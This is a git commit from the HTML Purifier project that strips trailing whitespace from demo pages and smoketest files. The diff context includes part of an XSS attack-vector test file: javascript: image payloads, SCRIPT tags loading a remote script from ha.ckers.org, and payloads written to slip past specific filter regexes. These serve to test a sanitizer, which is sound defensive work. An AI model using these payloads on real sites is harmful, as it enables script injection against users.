
Remove trailing whitespace.

Signed-off-by: Edward Z. Yang <edwardzyang@thewritingpot.com>
This commit is contained in:
Edward Z. Yang
2008-12-06 02:28:20 -05:00
parent 3a6b63dff1
commit 2c955af135
476 changed files with 5595 additions and 5547 deletions


@@ -5,7 +5,7 @@ require_once 'common.php';
header('Content-type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


@@ -2,7 +2,7 @@
require 'common.php';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


@@ -177,8 +177,8 @@
<sample><![CDATA[<ol type="1"><li>1</li><li>2</li></ul>]]></sample>
<sample><![CDATA[<ol><li type="a">1</li><li type="I">2</li></ul>]]></sample>
</group>
<!-- sample
<group title="">
<sample><![CDATA[]]></sample>


@@ -17,11 +17,11 @@ $strict = isset($_GET['d']) ? (bool) $_GET['d'] : false;
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?>
<?php if ($strict) { ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd">
<?php } else { ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<?php } ?>


@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">


@@ -25,7 +25,7 @@ if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
}
}
}
fix_magic_quotes($_GET);
fix_magic_quotes($_POST);
fix_magic_quotes($_COOKIE);


@@ -8,14 +8,14 @@ $interchange = HTMLPurifier_ConfigSchema_InterchangeBuilder::buildFromDirectory(
$interchange->validate();
if (isset($_GET['doc'])) {
// Hijack page generation to supply documentation
if (file_exists('test-schema.html') && !isset($_GET['purge'])) {
echo file_get_contents('test-schema.html');
exit;
}
$style = 'plain';
$configdoc_xml = 'test-schema.xml';
@@ -30,15 +30,15 @@ if (isset($_GET['doc'])) {
'css' => '../configdoc/styles/plain.css',
));
$html = $xslt->transformToHTML($configdoc_xml);
unlink('test-schema.xml');
file_put_contents('test-schema.html', $html);
echo $html;
exit;
}
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>


@@ -27,7 +27,7 @@ $purifier = new HTMLPurifier(array(
$html = isset($_POST['html']) ? $_POST['html'] : '';
$purified_html = $purifier->purify($html);
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>


@@ -3,7 +3,7 @@
require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>


@@ -3,7 +3,7 @@
require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>


@@ -3,7 +3,7 @@
require_once('common.php');
function formatCode($string) {
return
return
str_replace(
array("\t", '»', '\0(null)'),
array('<strong>\t</strong>', '<span class="linebreak">»</span>', '<strong>\0</strong>'),
@@ -15,7 +15,7 @@ function formatCode($string) {
);
}
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
@@ -64,18 +64,18 @@ $purifier = new HTMLPurifier($config);
$i = 0;
foreach ($xml->attack as $attack) {
$code = $attack->code;
// custom code for null byte injection tests
if (substr($code, 0, 7) == 'perl -e') {
$code = substr($code, $i=strpos($code, '"')+1, strrpos($code, '"') - $i);
$code = str_replace('\0', "\0", $code);
}
// disable vectors we cannot test in any meaningful way
if ($code == 'See Below') continue; // event handlers, whitelist defeats
if ($attack->name == 'OBJECT w/Flash 2') continue; // requires ActionScript
if ($attack->name == 'IMG Embedded commands 2') continue; // is an HTTP response
// custom code for US-ASCII, which couldn't be expressed in XML without encoding
if ($attack->name == 'US-ASCII encoding') $code = urldecode($code);
?>


@@ -133,7 +133,7 @@
<desc>INPUT Image</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
@@ -845,7 +845,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<name>Half-Open HTML/JavaScript</name>
<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</code>
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
As a side note, this was also effective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG tag.</desc>
<label>Embedded Character Attacks</label>
@@ -893,7 +893,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<name>Event Handlers List 1</name>
<code>See Below</code>
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
-FSCommand() (execute from within an embedded Flash object)
-onAbort() (when user aborts the loading of an image)
@@ -973,7 +973,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<code>See Below</code>
<desc>-onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like &lt;P STYLE=&quot;behavior:url(&apos;#default#time2&apos;)&quot; onEnd=&quot;alert(&apos;XSS&apos;)&quot;&gt;)
-onError() (loading of a document or image causes an error)
-onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
@@ -1048,7 +1048,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<name>Event Handlers List 3</name>
<code>See Below</code>
<desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle)
-onReset() (fires when user or attacker resets a form)
-onResize() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
@@ -1116,7 +1116,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of a regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
(this is an important one, because I&apos;ve seen this regex in the wild)</desc>
<label>XSS w/HTML Quote Encapsulation</label>
@@ -1137,7 +1137,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 4</name>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Yet another XSS to evade the same filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
The only thing I&apos;ve seen work against this XSS attack if you still want to allow &lt;SCRIPT&gt; tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags)</desc>
<label>XSS w/HTML Quote Encapsulation</label>